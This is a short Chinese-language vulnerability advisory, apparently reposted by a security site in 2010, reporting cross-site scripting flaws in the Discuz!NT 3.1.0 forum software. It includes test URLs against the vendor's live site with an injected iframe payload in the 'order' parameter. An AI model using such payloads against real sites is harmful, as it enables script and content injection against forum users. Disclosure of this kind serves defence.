Discuz!NT 3.1.0 多处持久性跨站漏洞

来源:岁月联盟 编辑:猪蛋儿 时间:2010-05-04

影响版本:
Discuz!NT 3.1.0

漏洞描述:
Discuz!NT,是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件,包括论坛、Space (个人空 间)、相册、聚合等功能,后台自由选择开启。

1.论坛相册空间日志发表评论,插入跨站语句即可:
http://nt.discuz.net/showphoto.aspx?photoid=42

2. 在论坛板块版面出随意选择一种浏览方式,然后修改或添加加入跨站语句,获得地址:
http://nt.discuz.net/showforum.aspx?search=1&forumid=10&typeid=0&filter=&order=%22%3E%3Ciframe%20src=http://www.syue.com%3E

<*参考

*>

测试方法:

http://nt.discuz.net/showphoto.aspx?photoid=42
http://nt.discuz.net/showforum.aspx?search=1&amp;forumid=10&typeid=0&filter=&order=%22%3E%3Ciframe%20src=http://www.syue.com%3E

安全建议:
等待官方补丁
http://nt.discuz.net

上一篇:动网(DVbbs) Ver 8.3.0 多个跨站漏洞
下一篇:SiteServer CMS多处跨站漏洞

最近更新

随机推荐